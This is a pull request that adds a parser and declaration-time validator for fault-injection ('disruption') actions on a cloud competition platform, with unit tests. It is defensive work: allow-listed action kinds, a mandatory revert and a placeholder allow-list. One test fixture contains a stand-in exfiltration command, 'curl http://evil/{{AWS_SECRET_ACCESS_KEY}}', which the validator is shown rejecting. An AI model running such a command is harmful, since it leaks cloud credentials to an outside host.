### PR TITLE
feat(disruption): action contract parser + declaration-time enforcement [#1419]

### DIFF
--- a/infrastructure/lib/utils/discover-problems-catalog.ts
+++ b/infrastructure/lib/utils/discover-problems-catalog.ts
@@ -185,6 +185,43 @@ export type DisruptionTrigger =
   | { readonly kind: "team-score-above"; readonly threshold: number }
   | { readonly kind: "phase-entered"; readonly phaseName: string };
 
+/**
+ * [ADR-031 / Issue #1419] cross-account disruption の宣言的アクション種別。 executor がこの kind で
+ * AssumeRole 後に叩く API を 1 本に dispatch する (ssm:SendCommand / lambda:InvokeFunction /
+ * cloudformation:UpdateStack)。 platform は kind を dispatch するだけ、 障害の中身は問題が所有する。
+ */
+export type DisruptionActionKind = "ssm-run-command" | "lambda-invoke" | "cfn-stack-update";
+
+export const DISRUPTION_ACTION_KINDS: readonly DisruptionActionKind[] = [
+  "ssm-run-command",
+  "lambda-invoke",
+  "cfn-stack-update",
+];
+
+/**
+ * [ADR-029 INV-2 / ADR-031] 障害の復旧宣言。 「いかなる disruption も永続しない」ための必須要素で、
+ * executor は注入と同時に `afterSeconds` 後 (または round 終了 / clear API) の revert を予約する。
+ */
+export interface DisruptionActionRevert {
+  readonly afterSeconds: number;
+  readonly documentName?: string;
+  readonly paramTemplate?: Readonly<Record<string, unknown>>;
+}
+
+/**
+ * [ADR-031 / Issue #1419] disruption が競技者アカウントで起こす障害の宣言。 `targetRef` は team の
+ * `stackOutputs` の key (= 注入対象を CFn 出力から解決)、 `paramTemplate` の `{{key}}` 置換は
+ * `parameters` / `operatorEditable` 由来の値のみを参照できる (= injection 面の縮小)。 `revert` は必須。
+ */
+export interface DisruptionAction {
+  readonly kind: DisruptionActionKind;
+  readonly targetRef: string;
+  readonly documentName?: string;
+  readonly functionRef?: string;
+  readonly paramTemplate?: Readonly<Record<string, unknown>>;
+  readonly revert: DisruptionActionRevert;
+}
+
 export interface ProblemDisruptionEntry {
   readonly id: string;
   readonly name: string;
@@ -196,6 +233,61 @@ export interface ProblemDisruptionEntry {
   readonly publicHint?: boolean;
   /** [ADR-013 Phase 2 / #1422] 宣言時のみ condition-triggered 発火が有効 (省略 = Phase 1 self-fire のみ)。 */
   readonly triggers?: readonly DisruptionTrigger[];
+  /** [ADR-031 / #1419] cross-account 実行アクション (省略 = Phase A 監査のみ = 後方互換)。 */
+  readonly action?: DisruptionAction;
+}
+
+/**
+ * SCHEMA `disruptions[].action` を型付きで取り出す。 executor が安全に実行できる形 (= kind が
+ * allow-list 内、 targetRef が string、 revert.afterSeconds が正の有限数) のときだけ返し、 それ以外は
+ * undefined (= fail-safe で Phase A 監査のみに倒す)。 宣言時の strict 検証は validate-problems が担う。
+ */
+export function parseDisruptionAction(value: unknown): DisruptionAction | undefined {
+  if (!value || typeof value !== "object" || Array.isArray(value)) return undefined;
+  const v = value as {
+    kind?: unknown;
+    targetRef?: unknown;
+    documentName?: unknown;
+    functionRef?: unknown;
+    paramTemplate?: unknown;
+    revert?: unknown;
+  };
+  if (!isDisruptionActionKind(v.kind) || typeof v.targetRef !== "string" || v.targetRef === "") {
+    return undefined;
+  }
+  const revert = parseDisruptionActionRevert(v.revert);
+  if (!revert) return undefined;
+  return {
+    kind: v.kind,
+    targetRef: v.targetRef,
+    ...(typeof v.documentName === "string" ? { documentName: v.documentName } : {}),
+    ...(typeof v.functionRef === "string" ? { functionRef: v.functionRef } : {}),
+    ...(isPlainObject(v.paramTemplate) ? { paramTemplate: v.paramTemplate } : {}),
+    revert,
+  };
+}
+
+function isDisruptionActionKind(value: unknown): value is DisruptionActionKind {
+  return (
+    typeof value === "string" && DISRUPTION_ACTION_KINDS.includes(value as DisruptionActionKind)
+  );
+}
+
+function isPlainObject(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}
+
+function parseDisruptionActionRevert(value: unknown): DisruptionActionRevert | undefined {
+  if (!isPlainObject(value)) return undefined;
+  const afterSeconds = value.afterSeconds;
+  if (typeof afterSeconds !== "number" || !Number.isFinite(afterSeconds) || afterSeconds <= 0) {
+    return undefined;
+  }
+  return {
+    afterSeconds,
+    ...(typeof value.documentName === "string" ? { documentName: value.documentName } : {}),
+    ...(isPlainObject(value.paramTemplate) ? { paramTemplate: value.paramTemplate } : {}),
+  };
 }
 
 /** SCHEMA `disruptions[].triggers[]` (oneOf) を型付きで取り出す。 不正 / 不明 kind は drop。 */
@@ -266,6 +358,7 @@ function parseDisruptionEntry(value: unknown): ProblemDisruptionEntry | undefine
     parameters?: unknown;
     publicHint?: unknown;
     triggers?: unknown;
+    action?: unknown;
   };
   if (
     typeof v.id !== "string" ||
@@ -275,6 +368,7 @@ function parseDisruptionEntry(value: unknown): ProblemDisruptionEntry | undefine
     return undefined;
   }
   const triggers = parseDisruptionTriggers(v.triggers);
+  const action = parseDisruptionAction(v.action);
   return {
     id: v.id,
     name: v.name,
@@ -294,6 +388,7 @@ function parseDisruptionEntry(value: unknown): ProblemDisruptionEntry | undefine
       : {}),
     ...(typeof v.publicHint === "boolean" ? { publicHint: v.publicHint } : {}),
     ...(triggers ? { triggers } : {}),
+    ...(action ? { action } : {}),
   };
 }
 

--- a/infrastructure/test/problem-deploy/disruption-triggers.test.ts
+++ b/infrastructure/test/problem-deploy/disruption-triggers.test.ts
@@ -11,6 +11,7 @@ import {
 import {
   type DisruptionTrigger,
   type ProblemDisruptionEntry,
+  parseDisruptionAction,
   parseDisruptionsCatalogEnv,
   parseDisruptionTriggers,
 } from "../../lib/utils/discover-problems-catalog";
@@ -52,6 +53,102 @@ describe("parseDisruptionTriggers", () => {
     expect(parseDisruptionTriggers(undefined)).toBeUndefined();
     expect(parseDisruptionTriggers("x")).toBeUndefined();
     expect(parseDisruptionTriggers([{ kind: "bogus" }])).toBeUndefined();
+  });
+});
+
+describe("parseDisruptionAction (ADR-031 #1419)", () => {
+  it("should parse a well-formed action carrying optional fields and a required revert", () => {
+    const action = parseDisruptionAction({
+      kind: "ssm-run-command",
+      targetRef: "WorkerInstanceIds",
+      documentName: "AWS-RunShellScript",
+      paramTemplate: { commands: ["tc qdisc add dev {{device}} root netem delay {{delayMs}}ms"] },
+      revert: { afterSeconds: 600, documentName: "AWS-RunShellScript" },
+    });
+    expect(action).toEqual({
+      kind: "ssm-run-command",
+      targetRef: "WorkerInstanceIds",
+      documentName: "AWS-RunShellScript",
+      paramTemplate: { commands: ["tc qdisc add dev {{device}} root netem delay {{delayMs}}ms"] },
+      revert: { afterSeconds: 600, documentName: "AWS-RunShellScript" },
+    });
+  });
+
+  it("should carry the lambda-invoke functionRef and drop unknown extra fields", () => {
+    const action = parseDisruptionAction({
+      kind: "lambda-invoke",
+      targetRef: "FaultFunctionName",
+      functionRef: "FaultFunctionName",
+      revert: { afterSeconds: 30 },
+      bogus: "ignored",
+    });
+    expect(action).toEqual({
+      kind: "lambda-invoke",
+      targetRef: "FaultFunctionName",
+      functionRef: "FaultFunctionName",
+      revert: { afterSeconds: 30 },
+    });
+  });
+
+  it("should fail-safe to undefined when the kind is not in the allow-list", () => {
+    expect(
+      parseDisruptionAction({ kind: "rm-rf", targetRef: "X", revert: { afterSeconds: 1 } }),
+    ).toBeUndefined();
+  });
+
+  it("should fail-safe to undefined when targetRef is missing or empty", () => {
+    expect(
+      parseDisruptionAction({ kind: "cfn-stack-update", revert: { afterSeconds: 1 } }),
+    ).toBeUndefined();
+    expect(
+      parseDisruptionAction({
+        kind: "cfn-stack-update",
+        targetRef: "",
+        revert: { afterSeconds: 1 },
+      }),
+    ).toBeUndefined();
+  });
+
+  it("should fail-safe to undefined when revert is missing or afterSeconds is non-positive / non-finite", () => {
+    expect(parseDisruptionAction({ kind: "lambda-invoke", targetRef: "X" })).toBeUndefined();
+    expect(
+      parseDisruptionAction({ kind: "lambda-invoke", targetRef: "X", revert: { afterSeconds: 0 } }),
+    ).toBeUndefined();
+    expect(
+      parseDisruptionAction({
+        kind: "lambda-invoke",
+        targetRef: "X",
+        revert: { afterSeconds: Number.POSITIVE_INFINITY },
+      }),
+    ).toBeUndefined();
+    expect(
+      parseDisruptionAction({
+        kind: "lambda-invoke",
+        targetRef: "X",
+        revert: { afterSeconds: "600" },
+      }),
+    ).toBeUndefined();
+  });
+
+  it("should fail-safe to undefined for non-object / array / null input", () => {
+    expect(parseDisruptionAction(undefined)).toBeUndefined();
+    expect(parseDisruptionAction(null)).toBeUndefined();
+    expect(parseDisruptionAction("x")).toBeUndefined();
+    expect(parseDisruptionAction([{ kind: "ssm-run-command" }])).toBeUndefined();
+  });
+
+  it("should drop a non-object paramTemplate / revert.paramTemplate but keep the action", () => {
+    const action = parseDisruptionAction({
+      kind: "ssm-run-command",
+      targetRef: "X",
+      paramTemplate: ["not", "an", "object"],
+      revert: { afterSeconds: 5, paramTemplate: "nope" },
+    });
+    expect(action).toEqual({
+      kind: "ssm-run-command",
+      targetRef: "X",
+      revert: { afterSeconds: 5 },
+    });
   });
 });
 

--- a/infrastructure/test/scripts/validate-problems-cross-ref.test.ts
+++ b/infrastructure/test/scripts/validate-problems-cross-ref.test.ts
@@ -3,6 +3,10 @@ import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
 import { tmpdir } from "node:os";
 import { join } from "node:path";
 import { afterEach, beforeEach, describe, expect, it } from "vitest";
+import {
+  checkDisruptionActionOutputRefs,
+  checkDisruptionActions,
+} from "../../../scripts/lib/disruption-action-check";
 import { checkCoordinationPluginFile } from "../../../scripts/validate-problems";
 
 /**
@@ -121,5 +125,139 @@ describe("checkCoordinationPluginFile content scan (ADR-030 S1 #1420)", () => {
     expect(joined).toContain("process.env access");
     expect(joined).toContain("fetch() call");
     expect(errs).toHaveLength(3);
+  });
+});
+
+describe("checkDisruptionActions (ADR-031 #1419)", () => {
+  const wellFormed = () => ({
+    disruptions: [
+      {
+        id: "ec2-latency-injection",
+        name: "latency",
+        eventDetailType: "DegradedDisruptionFired",
+        operatorEditable: ["afterMinutes"],
+        parameters: { delayMs: 200, device: "eth0" },
+        action: {
+          kind: "ssm-run-command",
+          targetRef: "WorkerInstanceIds",
+          documentName: "AWS-RunShellScript",
+          paramTemplate: {
+            commands: ["tc qdisc add dev {{device}} root netem delay {{delayMs}}ms"],
+          },
+          revert: { afterSeconds: 600 },
+        },
+      },
+    ],
+  });
+
+  it("should pass a well-formed action whose placeholders are all declared", () => {
+    expect(checkDisruptionActions(wellFormed())).toEqual([]);
+  });
+
+  it("should be a no-op when a disruption declares no action (Phase A backward compat)", () => {
+    expect(
+      checkDisruptionActions({
+        disruptions: [{ id: "x", name: "x", eventDetailType: "X" }],
+      }),
+    ).toEqual([]);
+    expect(checkDisruptionActions({})).toEqual([]);
+  });
+
+  it("should reject a kind outside the allow-list", () => {
+    const meta = wellFormed();
+    meta.disruptions[0].action.kind = "rm-rf-everything";
+    const errs = checkDisruptionActions(meta);
+    expect(errs.some((e) => e.includes("action.kind must be one of"))).toBe(true);
+  });
+
+  it("should reject a missing / empty targetRef", () => {
+    const meta = wellFormed();
+    meta.disruptions[0].action.targetRef = "";
+    expect(checkDisruptionActions(meta).some((e) => e.includes("targetRef"))).toBe(true);
+  });
+
+  it("should require a revert (ADR-029 INV-2: no disruption may be permanent)", () => {
+    const meta = wellFormed();
+    meta.disruptions[0].action.revert = undefined as unknown as { afterSeconds: number };
+    const errs = checkDisruptionActions(meta);
+    expect(errs.some((e) => e.includes("revert is required") && e.includes("INV-2"))).toBe(true);
+  });
+
+  it("should reject a non-positive or over-cap revert.afterSeconds", () => {
+    const zero = wellFormed();
+    zero.disruptions[0].action.revert = { afterSeconds: 0 };
+    expect(
+      checkDisruptionActions(zero).some((e) => e.includes("afterSeconds must be a positive")),
+    ).toBe(true);
+    const tooLong = wellFormed();
+    tooLong.disruptions[0].action.revert = { afterSeconds: 24 * 60 * 60 + 1 };
+    expect(checkDisruptionActions(tooLong).some((e) => e.includes("exceeds the"))).toBe(true);
+  });
+
+  it("should reject a paramTemplate placeholder not declared in parameters / operatorEditable", () => {
+    const meta = wellFormed();
+    meta.disruptions[0].action.paramTemplate = {
+      commands: ["curl http://evil/{{AWS_SECRET_ACCESS_KEY}}"],
+    };
+    const errs = checkDisruptionActions(meta);
+    expect(errs.some((e) => e.includes("{{AWS_SECRET_ACCESS_KEY}}"))).toBe(true);
+  });
+
+  it("should also scan revert.paramTemplate placeholders", () => {
+    const meta = wellFormed();
+    meta.disruptions[0].action.revert = {
+      afterSeconds: 600,
+      paramTemplate: { commands: ["echo {{undeclaredRevertKey}}"] },
+    } as unknown as { afterSeconds: number };
+    expect(checkDisruptionActions(meta).some((e) => e.includes("{{undeclaredRevertKey}}"))).toBe(
+      true,
+    );
+  });
+
+  it("should reject a non-object action", () => {
+    const errs = checkDisruptionActions({
+      disruptions: [{ id: "x", name: "x", eventDetailType: "X", action: "nope" }],
+    });
+    expect(errs.some((e) => e.includes("action must be an object"))).toBe(true);
+  });
+});
+
+describe("checkDisruptionActionOutputRefs (ADR-031 #1419)", () => {
+  const meta = {
+    disruptions: [
+      {
+        id: "ec2-latency-injection",
+        action: {
+          kind: "ssm-run-command",
+          targetRef: "WorkerInstanceIds",
+          functionRef: "FaultFunctionName",
+          revert: { afterSeconds: 600 },
+        },
+      },
+    ],
+  };
+
+  it("should pass when targetRef + functionRef are present in template Outputs", () => {
+    const yaml =
+      "Outputs:\n  WorkerInstanceIds:\n    Value: x\n  FaultFunctionName:\n    Value: y\n";
+    expect(checkDisruptionActionOutputRefs(meta, yaml, "template.yaml")).toEqual([]);
+  });
+
+  it("should report a targetRef that is not a CFn Output", () => {
+    const yaml = "Outputs:\n  FaultFunctionName:\n    Value: y\n";
+    const errs = checkDisruptionActionOutputRefs(meta, yaml, "template.yaml");
+    expect(errs).toHaveLength(1);
+    expect(errs[0]).toContain('targetRef="WorkerInstanceIds"');
+  });
+
+  it("should be a no-op when no disruption declares an action", () => {
+    expect(
+      checkDisruptionActionOutputRefs(
+        { disruptions: [{ id: "x" }] },
+        "Outputs:\n",
+        "template.yaml",
+      ),
+    ).toEqual([]);
+    expect(checkDisruptionActionOutputRefs({}, "Outputs:\n", "template.yaml")).toEqual([]);
   });
 });

--- a/scripts/lib/disruption-action-check.ts
+++ b/scripts/lib/disruption-action-check.ts
@@ -1,0 +1,150 @@
+/**
+ * [ADR-031 / Issue #1419] disruptions[].action (cross-account 障害注入の宣言) の契約を機械 enforce する。
+ *
+ *   - kind は allow-list (ssm-run-command / lambda-invoke / cfn-stack-update) 内
+ *   - targetRef (= 注入対象を解決する stackOutputs key) は非空 string
+ *   - revert 必須 + afterSeconds は 0 < x <= 24h (ADR-029 INV-2「いかなる disruption も永続しない」を宣言時に保証)
+ *   - paramTemplate / revert.paramTemplate の `{{key}}` placeholder は parameters / operatorEditable で
+ *     宣言済の key しか参照できない (= operator / 出題者が任意値を競技者アカウントの API へ流す injection 面を縮小)
+ *
+ * action 未宣言の disruption は Phase A (監査のみ) のままで無影響 (= 後方互換)。
+ *
+ * validate-problems.ts から切り出した独立 module (= SRP / file-too-large 回避)。
+ */
+
+type Metadata = Record<string, unknown>;
+type ValidationError = string;
+
+const DISRUPTION_ACTION_KINDS = new Set(["ssm-run-command", "lambda-invoke", "cfn-stack-update"]);
+const MAX_REVERT_AFTER_SECONDS = 24 * 60 * 60;
+const ACTION_PLACEHOLDER_RE = /\{\{\s*([A-Za-z0-9_]+)\s*\}\}/g;
+
+function collectActionStrings(value: unknown, out: string[]): void {
+  if (typeof value === "string") {
+    out.push(value);
+  } else if (Array.isArray(value)) {
+    for (const v of value) collectActionStrings(v, out);
+  } else if (value && typeof value === "object") {
+    for (const v of Object.values(value)) collectActionStrings(v, out);
+  }
+}
+
+function declaredPlaceholderKeys(d: Record<string, unknown>): Set<string> {
+  const keys = new Set<string>();
+  const params = d.parameters;
+  if (params && typeof params === "object" && !Array.isArray(params)) {
+    for (const k of Object.keys(params)) keys.add(k);
+  }
+  if (Array.isArray(d.operatorEditable)) {
+    for (const k of d.operatorEditable) if (typeof k === "string") keys.add(k);
+  }
+  return keys;
+}
+
+function checkActionRevert(id: string, revert: unknown): ValidationError[] {
+  if (!revert || typeof revert !== "object" || Array.isArray(revert)) {
+    return [
+      `disruptions[id=${id}].action.revert is required (ADR-029 INV-2: no disruption may be permanent)`,
+    ];
+  }
+  const afterSeconds = (revert as { afterSeconds?: unknown }).afterSeconds;
+  if (typeof afterSeconds !== "number" || !Number.isFinite(afterSeconds) || afterSeconds <= 0) {
+    return [
+      `disruptions[id=${id}].action.revert.afterSeconds must be a positive number of seconds`,
+    ];
+  }
+  if (afterSeconds > MAX_REVERT_AFTER_SECONDS) {
+    return [
+      `disruptions[id=${id}].action.revert.afterSeconds=${afterSeconds} exceeds the ${MAX_REVERT_AFTER_SECONDS}s cap (ADR-029 INV-2)`,
+    ];
+  }
+  return [];
+}
+
+function checkActionPlaceholders(
+  id: string,
+  action: Record<string, unknown>,
+  d: Record<string, unknown>,
+): ValidationError[] {
+  const declared = declaredPlaceholderKeys(d);
+  const strings: string[] = [];
+  collectActionStrings(action.paramTemplate, strings);
+  const revert = action.revert;
+  if (revert && typeof revert === "object" && !Array.isArray(revert)) {
+    collectActionStrings((revert as Record<string, unknown>).paramTemplate, strings);
+  }
+  const errors: ValidationError[] = [];
+  for (const s of strings) {
+    for (const m of s.matchAll(ACTION_PLACEHOLDER_RE)) {
+      const key = m[1];
+      if (key && !declared.has(key)) {
+        errors.push(
+          `disruptions[id=${id}].action references undeclared placeholder {{${key}}} (allow only parameters / operatorEditable keys)`,
+        );
+      }
+    }
+  }
+  return errors;
+}
+
+function checkSingleDisruptionAction(
+  id: string,
+  d: Record<string, unknown>,
+  action: unknown,
+): ValidationError[] {
+  if (!action || typeof action !== "object" || Array.isArray(action)) {
+    return [`disruptions[id=${id}].action must be an object`];
+  }
+  const a = action as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+  if (typeof a.kind !== "string" || !DISRUPTION_ACTION_KINDS.has(a.kind)) {
+    errors.push(
+      `disruptions[id=${id}].action.kind must be one of ssm-run-command | lambda-invoke | cfn-stack-update`,
+    );
+  }
+  if (typeof a.targetRef !== "string" || a.targetRef === "") {
+    errors.push(`disruptions[id=${id}].action.targetRef (stackOutputs key) is required`);
+  }
+  errors.push(...checkActionRevert(id, a.revert));
+  errors.push(...checkActionPlaceholders(id, a, d));
+  return errors;
+}
+
+export function checkDisruptionActions(meta: Metadata): ValidationError[] {
+  const disruptions = Array.isArray(meta.disruptions) ? meta.disruptions : [];
+  const errors: ValidationError[] = [];
+  for (const raw of disruptions as Array<Record<string, unknown>>) {
+    if (!raw || typeof raw !== "object" || raw.action === undefined) continue;
+    const id = typeof raw.id === "string" ? raw.id : "?";
+    errors.push(...checkSingleDisruptionAction(id, raw, raw.action));
+  }
+  return errors;
+}
+
+/**
+ * [ADR-031] action.targetRef / functionRef は team の stackOutputs (= CFn Output) key を指す。
+ * executable runtime のときだけ template.yaml の Outputs に実在するかを cross-ref する
+ * (scoring.flagOutputKey / endpoints[].default.key と同方針)。
+ */
+export function checkDisruptionActionOutputRefs(
+  meta: Metadata,
+  yaml: string,
+  cfnTemplate: string,
+): ValidationError[] {
+  const disruptions = Array.isArray(meta.disruptions) ? meta.disruptions : [];
+  const errors: ValidationError[] = [];
+  for (const raw of disruptions as Array<Record<string, unknown>>) {
+    const action = raw?.action as Record<string, unknown> | undefined;
+    if (!action || typeof action !== "object" || Array.isArray(action)) continue;
+    const id = typeof raw.id === "string" ? raw.id : "?";
+    for (const field of ["targetRef", "functionRef"] as const) {
+      const ref = action[field];
+      if (typeof ref === "string" && ref !== "" && !yaml.includes(`${ref}:`)) {
+        errors.push(
+          `disruptions[id=${id}].action.${field}="${ref}" not found in ${cfnTemplate} Outputs (= executor が注入対象を解決できない)`,
+        );
+      }
+    }
+  }
+  return errors;
+}

--- a/scripts/validate-problems.ts
+++ b/scripts/validate-problems.ts
@@ -23,6 +23,10 @@ import {
 } from "@tenkacloud/problem-runtime";
 import Ajv2020 from "ajv";
 import addFormats from "ajv-formats";
+import {
+  checkDisruptionActionOutputRefs,
+  checkDisruptionActions,
+} from "./lib/disruption-action-check";
 
 const REPO_ROOT = new URL("..", import.meta.url).pathname;
 const PROBLEMS_DIR = join(REPO_ROOT, "problems");
@@ -105,6 +109,7 @@ export function checkCrossRefs(metaPath: string, meta: Metadata): ValidationErro
     ...checkRuntimeConsistency(meta),
     ...checkDashboardSlotFiles(meta, dir),
     ...checkCoordinationPluginFile(meta, dir),
+    ...checkDisruptionActions(meta),
     ...checkRegionConsistency(meta),
   ];
 
@@ -116,6 +121,7 @@ export function checkCrossRefs(metaPath: string, meta: Metadata): ValidationErro
     errors.push(
       ...checkScoringOutputRefs(meta, yaml, runtime.entry),
       ...checkEndpointOutputRefs(meta, yaml, runtime.entry),
+      ...checkDisruptionActionOutputRefs(meta, yaml, runtime.entry),
     );
   }
   return errors;


### PR DESCRIPTION
## Summary

Implements **ADR-031 migration step 2 (platform half)** for #1419: the executor-facing parser + the **declaration-time enforcement** of the cross-account disruption `action` contract. No runtime executor yet (ADR-031 step 3) — this is the typed parse + the guardrails, mirroring how #1634 shipped the coordination S1 validator ahead of its dispatcher.

The `action` field lets a problem declare *how* a fired disruption injects a real fault in the competitor account (ADR-031). This PR adds the platform machinery that parses + validates that declaration.

### Changes

- **`discover-problems-catalog.ts`** — `DisruptionAction` / `DisruptionActionRevert` types + `DISRUPTION_ACTION_KINDS` + `parseDisruptionAction` + `action?` on `ProblemDisruptionEntry`. The catalog (serialized to the Lambda env the executor will read) now carries `action`. The parser is **fail-safe**: it only emits an action the executor can safely run (kind ∈ allow-list, `targetRef` string, `revert.afterSeconds` finite > 0); anything malformed drops to `undefined` → Phase A audit-only.
- **`scripts/lib/disruption-action-check.ts`** (new module) — `checkDisruptionActions` + `checkDisruptionActionOutputRefs`:
  - `kind` ∈ { ssm-run-command, lambda-invoke, cfn-stack-update }
  - `targetRef` (stackOutputs key) present + non-empty
  - **`revert` required + `afterSeconds` bounded (0 < x ≤ 24h)** — ADR-029 INV-2 ("no disruption may be permanent") enforced at authoring time
  - **paramTemplate placeholder allow-list** — every `{{key}}` in `paramTemplate` / `revert.paramTemplate` must be a declared `parameters` / `operatorEditable` key (injection-surface narrowing)
  - `targetRef` / `functionRef` must resolve to a CFn Output (executable runtimes)
- **`validate-problems.ts`** — wires both into `checkCrossRefs`. Extracted the checks into the module to keep `validate-problems.ts` under the harness `file-too-large` threshold (SRP — the harness flagged it, so the logic moved to its own module).
- **Tests** — `parseDisruptionAction` (8 cases) + `checkDisruptionActions` / `checkDisruptionActionOutputRefs` (13 cases): well-formed pass, all reject paths, backward-compat no-ops.

### Coupling note

The SCHEMA.json `action` block (so authors can *declare* the field) lives in the **problems submodule** (TenkaCloudChallenge) and lands there + a pin bump. This PR is green **without** it — no in-repo problem declares `action`, so all 7 problems still validate, and the validator/parser are unit-tested directly. The two halves are independent: this PR is the enforcement engine; the submodule PR is the schema surface.

## Test plan

- `infrastructure` tests: full suite **2387 pass**; new cases in `disruption-triggers.test.ts` (23) + `validate-problems-cross-ref.test.ts` (23).
- `bun run scripts/validate-problems.ts`: all 7 problems valid (backward compat).
- ajv smoke (local): the proposed schema accepts a well-formed action, rejects bad `kind` + missing `revert`.
- `make harness`: **no findings** (file-too-large cleared via the module extraction).
- `tsc --noEmit` + biome: clean. `check-no-conflicts`: HEAD merges cleanly into origin/main.

## Regression analysis

- **Purely additive + backward-compatible.** `action` is optional; `parseDisruptionAction` returns `undefined` for absent/malformed input, and `checkDisruptionActions` is a no-op when no disruption declares `action`. All existing disruptions (which have no `action`) behave exactly as before (Phase A audit-only).
- `parseDisruptionEntry` only gains a spread of `...(action ? { action } : {})` — entries without `action` are byte-identical to before; the existing `parseDisruptionsCatalogEnv` / triggers tests pass unchanged.
- The new validator runs in `checkCrossRefs`; with no `action` in any metadata it adds zero errors. The CFn-output ref check only runs for executable runtimes (same gate as the existing scoring/endpoint ref checks).
- Module extraction is a pure move (no logic change); the function bodies are identical to the inline versions, re-verified by the same tests.

## Physical impact

**NO-OP** on CloudFormation / deployed artifacts. Build-time catalog + a CI validation script only — no CDK construct, Lambda, IAM, or DynamoDB change. The serialized disruptions catalog (`BATTLE_PROBLEMS_DISRUPTIONS` env) gains an `action` key **only if** a problem declares one (none do yet), so the synthesized templates are unchanged.

Relates #1419